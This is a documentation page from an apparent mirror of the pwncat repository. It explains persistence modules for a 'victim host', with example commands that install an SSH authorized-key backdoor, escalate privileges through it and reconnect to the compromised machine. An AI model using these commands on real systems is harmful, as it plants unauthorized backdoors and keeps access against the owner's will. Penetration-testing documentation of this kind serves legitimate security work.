Saverr/pwncat
1
0
Fork 0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-24 09:35:39 +01:00
Code Projects Releases Wiki Activity
5d80d1b8e8
pwncat/docs/source/persist.rst

82 lines
3.2 KiB
ReStructuredText
Raw Normal View History

Updated documentation - Added some last touches to module system. - Modified connect syntax to allow more flexible parameters - Still need to update enumeration API docs and connect command docs
2020-10-03 04:28:47 +02:00
Persistence
===========
Persistence modules are implemented as sub-classes of the standard ``pwncat`` modules, and are placed
under the ``persist`` package. Persistence methods provide an abstract way to install and utilize various
persistence methods on the victim host.
An installed persistence method is tracked in the database, and can be utilized for escalation or
reconnecting to a disconnected victim depending on the persistence module itself.
Listing Installed Modules
-------------------------
The ``persist.gather`` module is used to gather the installed modules on the victim host. This module
is also used to remove persistence modules in bulk. To simply list all installed modules:
.. code-block:: bash
(local) pwncat$ run persist.gather
You can also specify any arguments available to persistence modules in the call to ``run`` in order
to filter the results:
.. code-block:: bash
(local) pwncat$ run persist.gather user=bob
Installing Persistence
----------------------
Persistence modules are installed by running the relevant module. For example, to install persistence
as the user ``bob`` with the ``persist.authorized_key`` module, you can do the following:
.. code-block:: bash
(local) pwncat$ run persist.authorized_key user=bob backdoor_key=./backdoor_id_rsa
Removing Persistence
--------------------
To remove a persistence module, you simply pass the ``remove`` argument to the module. It's worth noting
that the module arguments must be identical to the installed module in order to successfully remove the
module. To simplify this, you can use the ``persist.gather`` module to locate and remove the module.
.. code-block:: bash
# Remove the module by explicitly specifying all parameters
(local) pwncat$ run persist.authorized_key remove user=bob backdoor_key=./backdoor_id_rsa
# Remove the module by locating it with persist.gather and removing it
(local) pwncat$ run persist.gather remove user=bob
Escalating Using Persistence
----------------------------
Escalation with installed persistence can be done by passing the ``escalate`` argument to the
persistence module. Alternatively, it is recommended to simply utilize the ``escalate.auto``
module which will automatically select appropriate persistence modules if available.
.. code-block:: bash
# Escalate to bob via installed persistence
(local) pwncat$ run persist.authorized_key escalate user=bob backdoor_key=./backdoor_id_rsa
(local) pwncat$ run persist.gather escalate user=bob
# Recommended method
(local) pwncat$ run escalate.auto user=bob
Reconnecting to a Victim via Persistence
----------------------------------------
Remote persistence modules can be used to reconnect to a victim host. This is done with the ``connect``
command (or via the pwncat command line parameters). The ``reconnect`` protocol will achieve this:
.. code-block:: bash
# Reconnect as the specified user.
# Automatically select either an installed persistence method or prompt for ssh password
pwncat user@192.168.1.1
# Reconnect protocol explicitly
pwncat reconnect://user@192.168.1.1
# Reconnect with a specific module
pwncat reconnect://user:persist.authorized_key@192.168.1.1
Copy Permalink